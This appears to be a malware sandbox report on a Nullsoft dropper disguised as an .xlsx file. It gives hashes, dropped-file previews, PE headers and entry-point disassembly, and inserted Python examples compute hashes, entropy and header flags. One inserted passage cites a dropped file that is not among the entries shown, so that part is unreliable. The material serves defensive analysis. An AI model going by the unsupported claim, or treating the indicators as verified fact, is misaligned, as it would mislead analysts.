                                                        SHA-512:1286F05E6A7E6B691F6E479638E7179897598E171B52EB3A3DC0E830415251069D29416B6D1FFC6D7DCE8DA5625E1479BE06DB9B7179E7776659C5C1AD6AA706
                                                        Malicious:false
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                        Joe Sandbox View:
                                                        • Filename: Purchase-Order27112024.scr.exe, Detection: malicious, Browse
                                                        • Filename: 563299efce875400a8d9b44b96597c8e-sample (1).zip, Detection: malicious, Browse
                                                        • Filename: debit-note-19-08-dn-2024.exe, Detection: malicious, Browse
                                                        • Filename: debit-note-19-08-dn-2024.exe, Detection: malicious, Browse
                                                        • Filename: HE9306_AWBLaser_Single240812144358.exe, Detection: malicious, Browse
                                                        • Filename: HE9306_AWBLaser_Single240812144358.exe, Detection: malicious, Browse
                                                        • Filename: z41_EX24-772_24.exe, Detection: malicious, Browse
                                                        • Filename: z41_EX24-772_24.exe, Detection: malicious, Browse
                                                        • Filename: _EX24-772_24341300EX00314559_ARI TEKST#U0130L_KontrolCiktisiEkliListe.exe, Detection: malicious, Browse
                                                        • Filename: _EX24-772_24341300EX00314559_ARI TEKST#U0130L_KontrolCiktisiEkliListe.exe, Detection: malicious, Browse
                                                        Reputation:moderate, very likely benign file
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1...u.u.u...s.u.a....r.!..q....t....t.Richu.........................PE..L....n3T...........!..... ...........'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..S....0.......$..............@..@.data...x....@.......(..............@....reloc..b....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):1199146
                                                        Entropy (8bit):3.3464346722807505
                                                        Encrypted:false
                                                        SSDEEP:6144:AP75ehxbAWL8zT55SgB9EZ+K1I3KDJ5QYu0Eqk90Js9g5PNp0AJ2aJ4aKh:AP75ehxkWL8zz9Eo+2eIYBkWz5P4Ph
                                                        MD5:88C3E9ED0EF59E29A94711546BC32ABC
                                                        SHA1:30235C24491AF4AFA40967FB2E97E8C47A3A7C54
                                                        SHA-256:41C07FDBD9838B799D5EF07E1C85045CBE0910B322D93D5C5298D558F61426BB
                                                        SHA-512:1B2F1EA7976F98421061CF119BA047BAFF85567C3AECAC56E54F32A41A04A9355281BF3526B3A5A5852A26D8CD089DFBE39752B3D6B40E1DDAD6211D266D16B3
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:........,...................\...............................................................................................................................................................................................................................................................G...J...............j...........................................................................................................................................3...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):28
                                                        Entropy (8bit):4.110577243331642
                                                        Encrypted:false
                                                        SSDEEP:3:iGAeTUHvn:lAeTUHv
                                                        MD5:F6A80CF0B011E1638B38D8EAA2A9629B
                                                        SHA1:30AB7FEEC5D0A304ED9908ADD562601E3E7118C3
                                                        SHA-256:AB3B162F39F8FDBD8DD767791EC116E75DA198FCE6BABBA6E1677044678714D8
                                                        SHA-512:E1EC33696EA5086DEA0A52B577442B96124B71CD09999637185D114B7E5F313D455560C350F5A02FBA83C5A3A12A5234EEC995D0AF0CBF64471B3887E2AA2ED8
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:[Access]..Setting=Disabled..
                                                        Process:C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):28191
                                                        Entropy (8bit):4.5554172315993275
                                                        Encrypted:false
                                                        SSDEEP:384:lU5Foko0Wy6buRWcJT8QEai+6m7AiWjSHk8Rco00LIkqRPonGlo:lU5ekoHyzxT8KT7PiKkK0hrKJ
                                                        MD5:A8F95082B71E9CCC0A1B9D3285AB9125
                                                        SHA1:B475ED39780310238995E4C1F3F7CEC555D8AC98
                                                        SHA-256:0D0EBEBAF3EAA4D416399434511974EA882425CEBB01EC794C514CD329523C54
                                                        SHA-512:10C7E33F12C8A6ECB6088B016651A9FADC1BF6108E15F00584E59DEDBD93CF602BAD52487EF31035BFA858D3A762CEC0BC5B88FF8F01AFC4BDA9189DC40DF0EC
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:...T..i.........BB........;..._.;........ss..........................-.........p.fff..[......L..A.X...P.......ss...___.....D.#.....XX..^^^.....ddd.......... ..................n...........gggg.tttt....................FF.. .............kkk.........tt..................44..a............5..WWW...................:........nn........."..###......."""".......i..........................00..............2...uu........n..............Q.......V.........XXX........33......CCC.....................$..........4..............................qq..,.........T....\\\......EE......................................mm.............R..**.>>>.h.=.........m.........j..=.||..............................+++.o.....................zzzzz.s.....!..................aa........../...TTT......L.........%.....................cccccc.9999.........X.@@@..J.....i.......N......!!....................G...........r.....................$...+.....u.7.I....""...{{...............................VVV....................HH.............b......
                                                        Process:C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):207998
                                                        Entropy (8bit):1.2479248406208852
                                                        Encrypted:false
                                                        SSDEEP:768:tCENokMNjB1phztRILF3znwMWQZeRdtDL7xIC8GI82e/2awZ6aXmpeNhLvkoVtOX:e03p6cf0/e9ReE8H
                                                        MD5:5C283F56F45AD89C5D82538EA09AC0F5
                                                        SHA1:FA3736CF43F5841B9D4E28FF2024C17897EEF745
                                                        SHA-256:D53EE062B5FA4EB7DED4A658B37B70DD6E90A581AF5BDE713169971AE249F605
                                                        SHA-512:2B2516707050C5DFB7A8D9E151DEE98EDD44B59B08E0F19D301F80BFDE89129F47EC6079AC1E26F6D8C60AAFE2931A4D2BC720BEDD8149477810B0C8F558AD0A
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:..(.................>............................................................................................................8....dq......................`..-..............................................g..........s...............................................................................................................................b...RE.b.........................................................................w..........................................................................................%............................P..........]...............:.........B..........................................4.......................................................................n...............................................................o................4..................y...9........#......................m.....z...........................................................K.....D..............m...........................>...................?.....................k.....
                                                        Process:C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):443489
                                                        Entropy (8bit):1.2463028275519636
                                                        Encrypted:false
                                                        SSDEEP:768:0B5HMEmj1BG+VGKVbkxUNjTj4Yl+ieTSrPb/1aKigAurLC2DVyTaL7B8IHBxCoxa:0kFoC4xKmYKV1tmGJJt0a+sWH0
                                                        MD5:913964ACDFFFA24344A401D48E08C653
                                                        SHA1:EE1E0AC79DA12D6439F9DF5B865347647473642A
                                                        SHA-256:B3A4E2499F6A793497BAB8F5B6CC38462FD70F955308596ACFFF03D11F2F6ED4
                                                        SHA-512:2AEBEB7DFFACF4150CCF6ED91EF5501B129331E5A2A4A465FC542562C52907FDA3990F7BE5F17B60854DE7FD34E6E2E873ED8C0DE6788964894890F69A9F261C
                                                        Malicious:false
                                                        Preview:..9............................................................2...................A.....................................................7...........................................................................g.......m..........................v.z.........9.........................K....................................................................................%...................:....................................................h...(... ..........]......]...........................-......................................................f......2.................d..........C...........................9.........._.....................L.......................................v..........................J...................\....................|........................&......'....N.....................................o............................8.....................................................................................................n...................................
                                                        Process:C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):209062
                                                        Entropy (8bit):1.2469617066336303
                                                        Encrypted:false
                                                        SSDEEP:768:aq+yDnL4aSptsfjJcMBkQnTum3yc5rUGLJTLAP6zp2R5O73XKymSRQoWgqVB7L+v:T7c811jBM9Y1qeu30oHw
                                                        MD5:607886D87859E45164D2959809AB5367
                                                        SHA1:4E86EB72512D4C9BE32304E3A12B499D6A86084B
                                                        SHA-256:A05695DF251298ED2F35E2DFA2C4CF44D5BACCC391615FACD34FA6411BB43217
                                                        SHA-512:A767C56234A265E17FE3D05A1218D628419E3B750E7D55DD5E2D57A847DBF7B72E10270A1D9D14D39D62BCEF38818DE54168AF87C2DE59FDBF503F0C382DA5DE
                                                        Malicious:false
                                                        Preview:...............................................i........A........5............................b.t....!......................J.........................&................../Z.........................................................|........................T......^.................8...................D...............:..q......g.......................................................{........................p.................................................|..............B......`..............................0...............................o.......................N.......................f........................p............^.............................................................................+..A......................k........@...........................()......g..................U...................d.......................f...............].LF...................................................................}.._............................8......................................7..
                                                        Process:C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):290478
                                                        Entropy (8bit):7.563899642939822
                                                        Encrypted:false
                                                        SSDEEP:6144:1ehxbAWL8zT55SgB9EZ+K1I3KDJ5QYu0Eqk90Jb:1ehxkWL8zz9Eo+2eIYBkWJ
                                                        MD5:7C5950C0904C276B5EEA38CE56D01613
                                                        SHA1:2B55A0A107564148DAFD55B58CE9842962DD273C
                                                        SHA-256:2DF9631D6B7FFE6FF7DF858DB2953F7EA75AB9F37796B9531E4DFE587BA54FBA
                                                        SHA-512:C82B984900CF00F055D0ACAAA6902189455F9DA4838DF0A9B82AF4E137F87AF68E941953D2039257F322F12FC0980B0B1D011A5F14619CF62FBB0F205D8D5C39
                                                        Malicious:false
                                                        Preview:.......uu....................iiii.....C...........2.............hhh....4..z...>>..(.........}}}}..........................EEE........W...............................................||...RRR...3.........@.........|.]...........................................r..888.............nnnnnn.....*.........PPP........................#..*.~..............--....%%%%%%.../.......................ttt.......................,.................. ....d............................XX.W......WWWW..............QQ................v...............................#.....!!!............^^^................:::...L...{...bb...........j.a....7..............aaa..............................................tt..........u.RR.x..ZZ.NNN..n...........''''....X....LLL..a....ffff..........~~..T.............1...........KK................................KKKK..=..........]..l......../......QQ......UUUU........2....NNN.[[...........FF....M...$../.`..................)....@.......JJJJ.....e......<...................!...............b..
                                                        Process:C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                        File Type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
                                                        Category:dropped
                                                        Size (bytes):918
                                                        Entropy (8bit):3.519682367081025
                                                        Encrypted:false
                                                        SSDEEP:12:8wl0c0a/ledp8wXuQUlbq/JMRPbdpYmHbqjMRPBMJsW+slmYXcuzJCN85v4t2YZ2:8QudO/9Q6jd9a6+y3OcA24qy
                                                        MD5:7900E25CFFD2895DBDEB60C113A65174
                                                        SHA1:88273771D630FCA25150AB73319CAD9559DF2D8C
                                                        SHA-256:C199827F2DAB1C4952BBF0B6CEF442FE6920A74A5851ABD676C9BA11E9B4B00D
                                                        SHA-512:C444D6E76984BD94F165EFD9444E9DC179FD5451F3A94CE6319C1F83128E420232A8BA649D7811D9E5F3DFA03A02DA663EBFC8260D7FCF79F50E3499C69EE01A
                                                        Malicious:false
                                                        Preview:L..................F........................................................q....P.O. .:i.....+00.../C:\...................z.1...........Program Files (x86).X............................................P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...".f.1...........Common Files..J............................................C.o.m.m.o.n. .F.i.l.e.s.....b.2...........cutline.sil.H............................................c.u.t.l.i.n.e...s.i.l.......2.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.C.o.m.m.o.n. .F.i.l.e.s.\.c.u.t.l.i.n.e...s.i.l.S.C.:.\.U.s.e.r.s.\.h.u.b.e.r.t.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.T.e.m.p.l.a.t.e.s.\.t.y.p.h.l.o.s.t.o.m.y.\.C.a.r.f.u.f.f.l.i.n.g.........,...............$M....>M...EQ ..................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.3.................
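Each dropped-file entry above lists a size, an 8-bit entropy figure and an MD5/SHA1/SHA-256/SHA-512 set. The example below, added here and not Joe Sandbox tooling, recomputes those values from file bytes so a local copy can be checked against the report. Its two inputs are reconstructed from the report's previews, which print each CR and LF as a dot: the "ASCII text, with CRLF line terminators" type and the exact sizes (45 and 28 bytes) support that reading, but the bytes are an assumption, not the captured files, and the dictionary keys `reboot.ini` and `access.ini` are placeholder names because the report does not show the dropped file names. The entropy buckets are a rule of thumb, not report logic. The first reconstructed line, `Ac=user32::EnumWindows(i r2 ,i 0)`, reads as NSIS System plugin call syntax, which fits the Nullsoft self-extracting archive file type the report assigns to the sample.

```python
"""Recompute dropped-file hashes and 'Entropy (8bit)' from file bytes.
Added example, not Joe Sandbox code; inputs are RECONSTRUCTED from report previews."""
import hashlib
import math
from collections import Counter

# Placeholder names (the report omits them); bytes reconstructed with CRLF for each dot pair.
RECONSTRUCTED_DROPS = {
    "reboot.ini": b"[ReBoot]\r\nAc=user32::EnumWindows(i r2 ,i 0)\r\n",  # report: 45 bytes
    "access.ini": b"[Access]\r\nSetting=Disabled\r\n",                   # report: 28 bytes
}


def shannon_entropy(data: bytes) -> float:
    """Bits per byte over the 256-symbol alphabet, 0.0 .. 8.0; 0.0 for empty input."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def entropy_class(entropy: float) -> str:
    """Rule-of-thumb buckets (assumed thresholds, not taken from the report)."""
    if entropy >= 7.2:
        return "packed/encrypted or compressed"
    if entropy >= 4.0:
        return "code or text"
    return "sparse or highly repetitive"


def describe(data: bytes) -> dict:
    """The fields a dropped-file entry carries, hashes in the report's upper-case hex."""
    entropy = shannon_entropy(data)
    return {
        "size": len(data),
        "entropy": entropy,
        "class": entropy_class(entropy),
        "md5": hashlib.md5(data).hexdigest().upper(),
        "sha1": hashlib.sha1(data).hexdigest().upper(),
        "sha256": hashlib.sha256(data).hexdigest().upper(),
        "sha512": hashlib.sha512(data).hexdigest().upper(),
    }


def consistent_with_report(data: bytes, size: int, entropy: float) -> bool:
    """Cheap pre-check before comparing hashes: the size must match exactly and the
    entropy to float precision, otherwise the bytes are not the reported file."""
    d = describe(data)
    return d["size"] == size and abs(d["entropy"] - entropy) < 1e-9


if __name__ == "__main__":
    for name, data in RECONSTRUCTED_DROPS.items():
        print(name, describe(data))
```

For a reconstruction the entropy check is the useful one: the 28-byte input reproduces the report's 4.110577243331642 exactly, which a wrong byte histogram would not. The hashes then either match the entry (reconstruction exact) or pinpoint that a byte differs; the report's MD5 for that entry is F6A80CF0B011E1638B38D8EAA2A9629B for comparison.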
                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                        Entropy (8bit):7.884499331746193
                                                        TrID:
                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                        • DOS Executable Generic (2002/1) 0.02%
                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                        File name:09-FD-94.03.60.175.07.xlsx.exe
                                                        File size:530'598 bytes
                                                        MD5:321a9608e5bf03bf63f4574d0df1a380
                                                        SHA1:71c523fc14b83e0c8d5eac9bcc61c9487c1f2dfd
                                                        SHA256:c113d227b647a1a61b1f9f6c5350a25a43acc26960ef9d9b1a3c5e80e68d75f0
                                                        SHA512:ea16ef04d171e09971b49a8ee2cb1a4082ae794db9e6e53b2e702815cd275c48a390866de53845acf817a167ec14b4bf4c8c79cb8f590c8759f0cc1577a3e7ae
                                                        SSDEEP:12288:XRV78hkvtMm2pbzH3lzmBI9jD9Bu3faTXXes:I+vthovMO9jhBsiTXX7
                                                        TLSH:EEB423063AD1D81AD15D9A364FB3C2BDC376EC745C188E077F303E5B6C32A914A7A296
                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1.D9u.*ju.*ju.*j..ujw.*ju.+j..*j..wjd.*j!..j..*j..,jt.*jRichu.*j........PE..L....n3T.................`...*......Z3.......p....@
                                                        Icon Hash:0714262e34390f06
                                                        Entrypoint:0x40335a
                                                        Entrypoint Section:.text
                                                        Digitally signed:false
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                        Time Stamp:0x54336EB4 [Tue Oct 7 04:40:20 2014 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:
                                                        OS Version Major:4
                                                        OS Version Minor:0
                                                        File Version Major:4
                                                        File Version Minor:0
                                                        Subsystem Version Major:4
                                                        Subsystem Version Minor:0
                                                        Import Hash:e221f4f7d36469d53810a4b5f9fc8966
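The static fields above (entrypoint, time stamp, subsystem, image file characteristics, DLL characteristics, version numbers) are read straight out of the COFF and optional headers, and reading them yourself is the quickest way to triage a sample offline. The example below is added here and is not Joe Sandbox code; it decodes those headers with the standard library only. The PE it parses is constructed in memory as a header-only PE32 carrying the values the report lists, not the analysed file. One security-relevant point the flag decode makes visible: the report shows DYNAMIC_BASE together with RELOCS_STRIPPED. DYNAMIC_BASE opts the image in to ASLR, but without base relocations the loader cannot move it, so the image runs at its preferred base 0x400000 regardless of the flag.

```python
"""Decode the PE header fields a sandbox report prints, using only the standard library.
Added example, not Joe Sandbox code; build_sample_pe() is a CONSTRUCTED header-only PE32
carrying the report's values, not the analysed sample."""
import struct
from datetime import datetime, timezone

# IMAGE_FILE_HEADER.Characteristics bits (winnt.h), subset relevant to triage
FILE_CHARACTERISTICS = {
    0x0001: "RELOCS_STRIPPED", 0x0002: "EXECUTABLE_IMAGE", 0x0004: "LINE_NUMS_STRIPPED",
    0x0008: "LOCAL_SYMS_STRIPPED", 0x0020: "LARGE_ADDRESS_AWARE", 0x0100: "32BIT_MACHINE",
    0x0200: "DEBUG_STRIPPED", 0x2000: "DLL",
}
# IMAGE_OPTIONAL_HEADER.DllCharacteristics bits (winnt.h)
DLL_CHARACTERISTICS = {
    0x0020: "HIGH_ENTROPY_VA", 0x0040: "DYNAMIC_BASE", 0x0080: "FORCE_INTEGRITY",
    0x0100: "NX_COMPAT", 0x0200: "NO_ISOLATION", 0x0400: "NO_SEH", 0x0800: "NO_BIND",
    0x1000: "APPCONTAINER", 0x4000: "GUARD_CF", 0x8000: "TERMINAL_SERVER_AWARE",
}
SUBSYSTEMS = {1: "native", 2: "windows gui", 3: "windows cui"}


def flag_names(value: int, table: dict) -> list:
    """Names of the set bits, lowest bit first (the order the report uses)."""
    return [name for bit, name in sorted(table.items()) if value & bit]


def parse_pe(data: bytes) -> dict:
    """Walk DOS header -> COFF header -> PE32 optional header and decode the fields."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    coff = e_lfanew + 4
    machine, _nsect, timestamp, _symtab, _nsyms, _optsize, characteristics = \
        struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    (magic,) = struct.unpack_from("<H", data, opt)
    if magic != 0x10B:
        raise ValueError("only PE32 (magic 0x10b) is handled here")
    (entry_rva,) = struct.unpack_from("<I", data, opt + 16)
    (image_base,) = struct.unpack_from("<I", data, opt + 28)
    os_major, os_minor, _, _, ss_major, ss_minor = struct.unpack_from("<6H", data, opt + 40)
    subsystem, dll_chars = struct.unpack_from("<HH", data, opt + 68)
    when = datetime.fromtimestamp(timestamp, timezone.utc)
    info = {
        "machine": hex(machine),
        "time_stamp": timestamp,
        "time_stamp_utc": f"{when:%a %b} {when.day} {when:%H:%M:%S %Y} UTC",
        "entrypoint": image_base + entry_rva,
        "image_base": image_base,
        "subsystem": SUBSYSTEMS.get(subsystem, str(subsystem)),
        "os_version": f"{os_major}.{os_minor}",
        "subsystem_version": f"{ss_major}.{ss_minor}",
        "file_characteristics": flag_names(characteristics, FILE_CHARACTERISTICS),
        "dll_characteristics": flag_names(dll_chars, DLL_CHARACTERISTICS),
    }
    # DYNAMIC_BASE opts in to ASLR, but RELOCS_STRIPPED means there is no .reloc data,
    # so the loader cannot rebase the image and it runs at ImageBase regardless.
    info["aslr_effective"] = ("DYNAMIC_BASE" in info["dll_characteristics"]
                              and "RELOCS_STRIPPED" not in info["file_characteristics"])
    return info


def build_sample_pe() -> bytes:
    """CONSTRUCTED header-only PE32 with the report's values (no sections, no code)."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)                      # e_lfanew: PE header follows
    file_chars = 0x0001 | 0x0002 | 0x0004 | 0x0008 | 0x0100    # RELOCS_STRIPPED .. 32BIT_MACHINE
    coff = struct.pack("<HHIIIHH", 0x14C, 0, 0x54336EB4, 0, 0, 224, file_chars)
    opt = bytearray(224)                                       # standard PE32 optional header size
    struct.pack_into("<H", opt, 0, 0x10B)                      # PE32 magic
    struct.pack_into("<I", opt, 16, 0x335A)                    # AddressOfEntryPoint (RVA)
    struct.pack_into("<I", opt, 28, 0x400000)                  # ImageBase
    struct.pack_into("<6H", opt, 40, 4, 0, 0, 0, 4, 0)         # OS 4.0, image 0.0, subsystem 4.0
    dll_chars = 0x0040 | 0x0100 | 0x0400 | 0x8000              # DYNAMIC_BASE .. TERMINAL_SERVER_AWARE
    struct.pack_into("<HH", opt, 68, 2, dll_chars)             # Subsystem 2: windows gui
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)


if __name__ == "__main__":
    for key, value in parse_pe(build_sample_pe()).items():
        print(f"{key}: {value}")
```

To run it on a real file, replace `build_sample_pe()` with `open(path, "rb").read()`; the parser deliberately stops at the optional header, so it does not compute the import hash listed above, which needs the import directory as well.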
                                                        Instruction
                                                        sub esp, 000002D8h
                                                        push ebx
                                                        push ebp
                                                        push esi
                                                        push edi
                                                        push 00000020h
                                                        xor ebp, ebp
                                                        pop esi
                                                        mov dword ptr [esp+18h], ebp
                                                        mov dword ptr [esp+10h], 00409230h
                                                        mov dword ptr [esp+14h], ebp
                                                        call dword ptr [00407034h]
                                                        push 00008001h
                                                        call dword ptr [004070BCh]
                                                        push ebp
                                                        call dword ptr [004072ACh]
                                                        push 00000009h
                                                        mov dword ptr [004292B8h], eax
                                                        call 00007F11BCBCC8EAh
                                                        mov dword ptr [00429204h], eax
                                                        push ebp
                                                        lea eax, dword ptr [esp+38h]
                                                        push 000002B4h
                                                        push eax
                                                        push ebp
                                                        push 004206A8h
                                                        call dword ptr [0040717Ch]
                                                        push 0040937Ch
                                                        push 00428200h
                                                        call 00007F11BCBCC555h
                                                        call dword ptr [00407134h]
                                                        mov ebx, 00434000h
                                                        push eax
                                                        push ebx
                                                        call 00007F11BCBCC543h
                                                        push ebp
                                                        call dword ptr [0040710Ch]
                                                        push 00000022h
                                                        mov dword ptr [00429200h], eax
                                                        pop edi
                                                        mov eax, ebx
                                                        cmp word ptr [00434000h], di
                                                        jne 00007F11BCBC99D9h
                                                        mov esi, edi
                                                        mov eax, 00434002h
                                                        push esi
                                                        push eax
                                                        call 00007F11BCBCBF93h
                                                        push eax
                                                        call dword ptr [00407240h]
                                                        mov ecx, eax
                                                        mov dword ptr [esp+1Ch], ecx
                                                        jmp 00007F11BCBC9ACBh
                                                        push 00000020h
                                                        pop edx
                                                        cmp ax, dx
                                                        jne 00007F11BCBC99D9h
                                                        inc ecx
                                                        inc ecx
                                                        cmp word ptr [ecx], dx
                                                        Programming Language:
                                                        • [EXP] VC++ 6.0 SP5 build 8804
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x7494 | 0xb4 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x4a000 | 0x132d8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x7000 | 0x2b8 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x5ec6 | 0x6000 | 60ec0c4d80dd6821cdaced6135eddfd5 | False | 0.6593424479166666 | data | 6.438901783265187 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x7000 | 0x1354 | 0x1400 | 2222fe44ebbadbc32af32dfc9c88e48e | False | 0.4306640625 | data | 5.037511188789184 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x9000 | 0x202f8 | 0x600 | 99cdd6cde9adee6bf3b24ee817b4574b | False | 0.4830729166666667 | data | 3.8340327961758165 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata | 0x2a000 | 0x20000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x4a000 | 0x132d8 | 0x13400 | 6a5bbc33287fc34c026c3652aab40ca4 | False | 0.7685800527597403 | data | 6.977243320980138 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x4a448 | 0xb1b3 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9923501351915763
RT_ICON | 0x55600 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.4311203319502075
RT_ICON | 0x57ba8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.48053470919324576
RT_ICON | 0x58c50 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | United States | 0.5330490405117271
RT_ICON | 0x59af8 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | United States | 0.5647540983606557
RT_ICON | 0x5a480 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | United States | 0.6353790613718412
RT_ICON | 0x5ad28 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | English | United States | 0.5961981566820277
RT_ICON | 0x5b3f0 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | United States | 0.3176829268292683
RT_ICON | 0x5ba58 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | United States | 0.42124277456647397
RT_ICON | 0x5bfc0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.6453900709219859
RT_ICON | 0x5c428 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | United States | 0.4274193548387097
RT_ICON | 0x5c710 | 0x1e8 | Device independent bitmap graphic, 24 x 48 x 4, image size 288 | English | United States | 0.4651639344262295
RT_ICON | 0x5c8f8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | United States | 0.5067567567567568
RT_DIALOG | 0x5ca20 | 0x100 | data | English | United States | 0.5234375
RT_DIALOG | 0x5cb20 | 0x11c | data | English | United States | 0.6056338028169014
RT_DIALOG | 0x5cc40 | 0xc4 | data | English | United States | 0.5918367346938775
RT_DIALOG | 0x5cd08 | 0x60 | data | English | United States | 0.7291666666666666
RT_GROUP_ICON | 0x5cd68 | 0xbc | data | English | United States | 0.601063829787234
RT_VERSION | 0x5ce28 | 0x1a4 | data | English | United States | 0.5642857142857143
RT_MANIFEST | 0x5cfd0 | 0x305 | XML 1.0 document, ASCII text, with very long lines (773), with no line terminators | English | United States | 0.5614489003880984
DLL | Import
